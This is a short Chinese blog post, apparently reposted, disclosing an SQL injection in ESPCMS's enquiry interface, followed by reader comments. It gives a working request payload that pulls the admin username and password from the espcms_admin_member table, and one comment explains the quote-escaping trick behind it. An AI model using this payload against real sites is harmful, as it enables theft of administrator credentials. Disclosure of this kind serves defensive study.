espcms sql注入漏洞

文章目录

漏洞作者: Noxxx

文件 /interface/enquiry.php :

in_enquirysave 函数中

 

这里还有就是 userid需要自己提交 did的产品id必须为存在的 产品展示->里面就能找到id

http://127.0.0.1/php/espcmsv/index.php?ac=enquiry&at=enquirysave

tsn=&userid=3&did[x]=1&amount=1&ptitle[x]=,(SELECT CONCAT(USERNAME,0x7c,PASSWORD) FROM espcms_admin_member LIMIT 1 ),1,1)#&email=xxx@qq.com

漏洞证明:

142154499c158c958acf8ca42f211dbc462d6ed3

 

 

142155047d5d743f5f6b9218a44aed791873094b

 

14215520edfa4906cc85de9094b2d0f6612f445b

 

 

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 4 Responses to “espcms sql注入漏洞”
    • panda

      请问这个用的啥firefox 插件呢

    • agnes

      转的吧?看了半天才知道什么原理,要提交tsn=' 之类的东西,让$tsn=\',然后在tsn[0]取得了\,插入到sql中,转义了原本的单引号。楼主这写的我看了好久没懂。思路真是淫荡。